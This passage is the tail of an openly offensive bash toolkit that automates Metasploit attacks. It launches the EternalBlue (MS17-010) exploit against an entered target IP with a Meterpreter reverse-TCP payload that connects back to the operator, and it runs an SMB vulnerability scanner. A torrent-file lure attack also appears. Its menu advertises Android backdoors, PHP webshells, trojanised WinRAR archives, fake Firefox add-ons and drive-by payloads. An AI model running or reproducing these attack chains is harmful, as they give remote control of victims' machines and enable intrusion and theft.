windows/meterpreter/reverse_tcp; set LHOST $LHOST; set SRVHOST $LHOST; set EXTENSIONS torrent; set LPORT $port; exploit -j'" 4400 | 4401 | echo "Done !" 4402 | sleep 1 4403 | 4404 | } 4405 | 4406 | 4407 | 4408 | explo () { 4409 | clear 4410 | echo 4411 | echo 4412 | echo "please wait.........." 4413 | sleep 2 4414 | clear 4415 | echo $BLUE 4416 | echo "------------------------------------------" 4417 | echo "Your Local IP Address:[ $myip " 4418 | echo " " 4419 | echo "Your Public IP Address:[ $myip2 " 4420 | echo " " 4421 | echo "------------------------------------------" 4422 | echo "" $GREEN 4423 | echo 4424 | echo -n "Enter LHOST=$RED" 4425 | read LHOST 4426 | if [ -z $LHOST ];then 4427 | echo 4428 | echo 4429 | echo "$RED[x]$BLUE The error your not Enter anything !! " 4430 | sleep 3 4431 | winhack 4432 | fi 4433 | echo "" $GREEN 4434 | sleep 1 4435 | echo "LHOST==>$BLUE $LHOST "$GREEN 4436 | echo 4437 | echo "===========================" 4438 | echo 4439 | echo -n "Enter targetIP=$RED" 4440 | read target 4441 | if [ -z $target ];then 4442 | echo 4443 | echo 4444 | echo "$RED[x]$BLUE The error your not Enter anything !! " 4445 | sleep 3 4446 | winhack 4447 | fi 4448 | echo "" $GREEN 4449 | sleep 1 4450 | echo "targetIP==>$BLUE $target "$GREEN 4451 | echo 4452 | echo "===========================" 4453 | sleep 1 4454 | clear 4455 | echo 4456 | echo 4457 | echo " Final Config: [exploit [$target]] " 4458 | echo "=========================================" 4459 | echo "$BLUE LHOST $GREEN:>$RED $LHOST $GREEN" 4460 | echo "$BLUE targetIP $GREEN:>$RED $target $GREEN" 4461 | echo "$BLUE exploit $GREEN:>$RED exploit/windows/smb/ms17_010_eternalblue $GREEN" 4462 | sleep 3 4463 | echo 4464 | echo 4465 | echo "$BLUE[*]$RED:$GREEN Starting exploit$RED [$target] " 4466 | sleep 1 4467 | xterm -T "DHH - exploit[$target]" -geometry 110x23 -e "msfconsole -x 'use exploit/windows/smb/ms17_010_eternalblue ; set LHOST $LHOST; set rhost $target; set PAYLOAD windows/meterpreter/reverse_tcp; exploit -j'" 4468 | echo 4469 | echo "Done!" 4470 | sleep 1 4471 | clear 4472 | otherexploit 4473 | 4474 | } 4475 | 4476 | bac () { 4477 | clear 4478 | otherexploit 4479 | 4480 | } 4481 | 4482 | 4483 | function winhack { 4484 | clear 4485 | echo 4486 | echo 4487 | echo "please wait.........." 4488 | sleep 2 4489 | clear 4490 | echo 4491 | echo "" $GREEN 4492 | echo "============================" 4493 | echo 4494 | echo -n "Enter targetIP=$RED" 4495 | read target 4496 | if [ -z $target ];then 4497 | echo 4498 | echo 4499 | echo "$RED[x]$BLUE The error your not Enter anything !! " 4500 | sleep 3 4501 | winhack 4502 | fi 4503 | echo "" $GREEN 4504 | sleep 1 4505 | echo "targetIP==>$BLUE $target "$GREEN 4506 | echo 4507 | echo "===========================" 4508 | sleep 1 4509 | clear 4510 | echo 4511 | echo 4512 | echo " Final Config: [scanner $target ] " 4513 | echo "=========================================" 4514 | echo "$BLUE targetIP $GREEN:>$RED $target $GREEN" 4515 | echo "$BLUE exploit $GREEN:>$RED auxiliary/scanner/smb/smb_ms17_010 $GREEN" 4516 | sleep 3 4517 | echo 4518 | echo 4519 | echo "starting scan target$RED[$target]" 4520 | sleep 1 4521 | xterm -T "DHH -SCANNER [$target]" -geometry 110x23 -e "msfconsole -x 'use auxiliary/scanner/smb/smb_ms17_010; set rhosts $target; exploit -j'" 4522 | echo 4523 | echo "$BLUE[*]$RED:$GREEN Done" 4524 | sleep 1 4525 | clear 4526 | echo 4527 | echo "" $RED 4528 | echo " ##########################################################" 4529 | echo " ################$GREEN Was the target infected ?$RED #############" 4530 | echo " ##########################################################"$BLUE 4531 | echo $GREEN 4532 | echo "if target infected choice 1 to $BLUE run exploit "$GREEN 4533 | echo 4534 | echo "if target not infected choice 2 to $BLUE back to menu"$GREEN 4535 | echo "======================================================== "$BLUE 4536 | echo " 1 -$RED run exploit "$BLUE 4537 | echo "" 4538 | echo " 2 -$RED back to menu " 4539 | echo ""$GREEN 4540 | echo -n "ENTER YOUR CHOICE [1/2] : $RED" 4541 | read coi 4542 | case $coi in 4543 | 1)explo ;; 4544 | 2)bac ;; 4545 | *) echo "\"$coi\":$RED[x]$BLUE The error of your choice does not exist"; sleep 2 ;; 4546 | esac 4547 | winhack 4548 | 4549 | } 4550 | 4551 | 4552 | 4553 | function otherexploit { 4554 | clear 4555 | cat << ! 4556 | $RED 4557 | ╔═╗┌┬┐┬ ┬┌─┐┬─┐ ┌─┐─┐ ┬┌─┐┬ ┌─┐┬┌┬┐ 4558 | ║ ║ │ ├─┤├┤ ├┬┘ ├┤ ┌┴┬┘├─┘│ │ ││ │ 4559 | ╚═╝ ┴ ┴ ┴└─┘┴└─ └─┘┴ └─┴ ┴─┘└─┘┴ ┴ 4560 | 4561 | $GREEN 4562 | 4563 | 1 $BLUE >[Hack android use link] $GREEN 4564 | 2 $BLUE >[Hack windows use torrent file] $GREEN 4565 | 3 $BLUE >[Check the Windows operating system target of the MS_17 [Eternabalu]$GREEN 4566 | 4567 | 4 $BLUE >$RED EXIT$GREEN 4568 | 4569 | ! 4570 | echo "============================================" 4571 | echo 4572 | echo -n "Enter Choice >> : $RED " 4573 | read other 4574 | case $other in 4575 | 1)andro1 ;; 4576 | 2)win1 ;; 4577 | 3)winhack ;; 4578 | 4)exie ;; 4579 | *) echo "\"$other\":$RED[x]$BLUE The error of your choice does not exist"; sleep 2 ;; 4580 | esac 4581 | otherexploit 4582 | 4583 | } 4584 | 4585 | 4586 | 4587 | exie() { 4588 | echo 4589 | echo "" $GREEN 4590 | echo "Exiting...." 4591 | sleep 2 4592 | clear && exit 0 4593 | } 4594 | 4595 | while : 4596 | do 4597 | clear 4598 | cat << ! 4599 | 4600 | $GREEN 4601 | ------------------------------------------------------------------------$RED| 4602 | | 4603 | ╔═╗─┐ ┬┌─┐┬ ┌─┐┬┌┬┐┌─┐┌┬┐┬┌─┐┌┐┌ ┌─┐┬ ┌─┐┌┬┐┌─┐┌─┬─┐┌┬┐ | 4604 | ║╣ ┌┴┬┘├─┘│ │ ││ │ ├─┤ │ ││ ││││ ├─┘│ ├─┤ │ ├┤ │ │├┬┘│││ | 4605 | ╚═╝┴ └─┴ ┴─┘└─┘┴ ┴ ┴ ┴ ┴ ┴└─┘┘└┘ ┴ ┴─┘┴ ┴ ┴ └ └─┘┴└─┴ ┴ |$BLUE 4606 | $RED |$BLUE 4607 | by --->$GREEN Oseid Aldary$BLUE <----$RED | 4608 | | 4609 | There is no safe system :)$RED |$GREEN 4610 | $RED|$GREEN 4611 | -------------------------Automated Exploits-----------------------------$RED|$BLUE 4612 | $BLUE $RED |$BLUE 4613 | 1 =>> Windows Payloads >> [ Windows Payloads Menu ]$RED|$BLUE 4614 | 2 =>> Linux Payloads >> [ Linux Payloads Menu ]$RED|$BLUE 4615 | 3 =>> Mac osx Payload >> [ Apple-Mac Payload ]$RED|$BLUE 4616 | 4 =>> Android Backdoors >> [ Android Backdoors Menu ]$RED|$BLUE 4617 | 5 =>> Java Signed Applet >> [ Multi-Operative Systems ]$RED|$BLUE 4618 | 6 =>> Webshell[php] >> [ Website Backdoor Shell ]$RED|$BLUE 4619 | 7 =>> Winrar Backdoor >> [ Inject Payload Into a Winrar ]$RED|$BLUE 4620 | 8 =>> Firefox Addition >> [ Fake Firefox Addition ]$RED|$BLUE 4621 | 9 =>> Web_Driveby >> [ Powershell/ ro /Pythhon ]$RED|$BLUE 4622 | 10 =>> other exploit >> [ Android // Windows ]$RED|$BLUE 4623 | $RED| 4624 | ____________________________________________| 4625 | $GREEN $RED|$BLUE[*]$RED:$BLUE[Public IP ADDR: $GREEN$myip2$BLUE ]$GREEN 4626 | $RED|$BLUE[*]$RED:$BLUE[Local IP ADDR : $GREEN$myip$BLUE ] 4627 | E =>> Exit $RED|$BLUE[*]$RED:$BLUE[Interface Use : $GREEN$In$BLUE ] 4628 | $RED|$BLUE[*]$RED:$BLUE[Gateway: $GREEN$GAT$BLUE ]$RED 4629 | ____________________________| 4630 | ! 4631 | echo 4632 | echo "" $RED 4633 | echo -n "[>]$GREEN:[Enter Your Choice$BLUE ->>> "$RED 4634 | read word 4635 | case $word in 4636 | 1)wine ;; 4637 | 2)linu ;; 4638 | 3)mac ;; 4639 | 4)android ;; 4640 | 5)java ;; 4641 | 6)web ;; 4642 | 7)wiri ;; 4643 | 8)fireadd ;; 4644 | 9)webdd ;; 4645 | 10)otherexploit ;; 4646 | e)exie ;; 4647 | E)exie ;; 4648 | *) echo "\"$word\":$RED[x]$BLUE The error of your choice does not exist"; sleep 2 ;; 4649 | esac 4650 | done 4651 | 4652 | ############################################################## 4653 | ##################### ######################### 4654 | ##################### END OF Module ######################### 4655 | ##################### ######################### 4656 | ############################################################## 4657 | #This Module by Oseid Aldary 4658 | #Have a nice day :) 4659 | #GoodBye 4660 | 4661 | --------------------------------------------------------------------------------